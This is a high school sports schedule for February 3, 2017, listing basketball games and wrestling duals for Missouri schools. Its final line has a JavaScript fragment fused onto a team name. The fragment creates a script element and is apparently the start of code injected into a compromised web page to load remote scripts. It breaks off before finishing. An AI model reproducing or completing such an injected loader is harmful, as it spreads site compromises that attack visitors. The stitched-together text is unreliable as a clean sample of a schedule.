HIGH SCHOOL SCHEDULE FOR 2-3-17

GRC CROSSOVER GAMES-
GIRLS @ 6 PM
STANBERRY @ TRENTON FOR GRC CHAMPIONSHIP
KING CITY @ GALLATIN
NORTH ANDREW @ SOUTH HARRISON
BRAYMER @ PUTNAM COUNTY
WORTH COUNTY @ PRINCETON
PATTONSBURG @ MILAN
ST. JOE CHRISTIAN @ POLO
ALBANY @ MAYSVILLE
BOYS @ APPROX. 7:45
STANBERRY @ TRENTON FOR GRC CHAMPIONSHIP
NORTH ANDREW @ PUTNAM COUNTY
BRAYMER @ MAYSVILLE
WORTH COUNTY @ GALLATIN
KING CITY @ MILAN
ST. JOSEPH CHRISTIAN @ SOUTH HARRISON
PATTONSBURG @ PRINCETON
ALBANY @ POLO
DOUBLEHEADERS-
WEST PLATTE @ EAST BUCHANAN
LAWSON @ HAMILTON———————-LIVE ON KKWK 100.1 FM
LATHROP @ NORTH PLATTE
PLATTSBURG @ MID-BUCHANAN
GILMAN CITY vs EAST HARRISON @ RIDGEWAY
MERCER @ NORTH HARRISON
NORBORNE @ TRI-COUNTY
DeKALB @ MOUND CITY
NORTH NODAWAY vs EAST ATCHISON @ TARKIO
STEWARTSVILLE @ JEFFERSON
WEST NODAWAY @ NODAWAY-HOLT
NORTHEAST NODAWAY @ SOUTH NODAWAY
OSBORN @ UNION STAR
ROCK PORT @ SOUTH HOLT
ST. JOE CENTRAL @ LIBERTY NORTH
GIRLS-
LAFAYETTE @ CAMERON
ODESSA @ EXCELSIOR SPRINGS
BOYS-
CAMERON @ LAFAYETTE
CHILLICOTHE @ BENTON
SAVANNAH @ BISHOP LeBLOND
SMITHVILLE @ MARYVILLE
EXCELSIOR SPRINGS @ ODESSA
KEARNEY @ WINNETONKA
WRESTLING-
SATURDAY-
ALBANY WARRIOR DUALS-ALBANY, HAMILTON, STANBERRY, EAST ATCHISON
RICHMOND TOURNAMENT-RICHMOND, CHILLICOTHE
LEXINGTON DUALS-LEXINGTON, LAWSONvar d=document;var s=d.createElement(‘script’);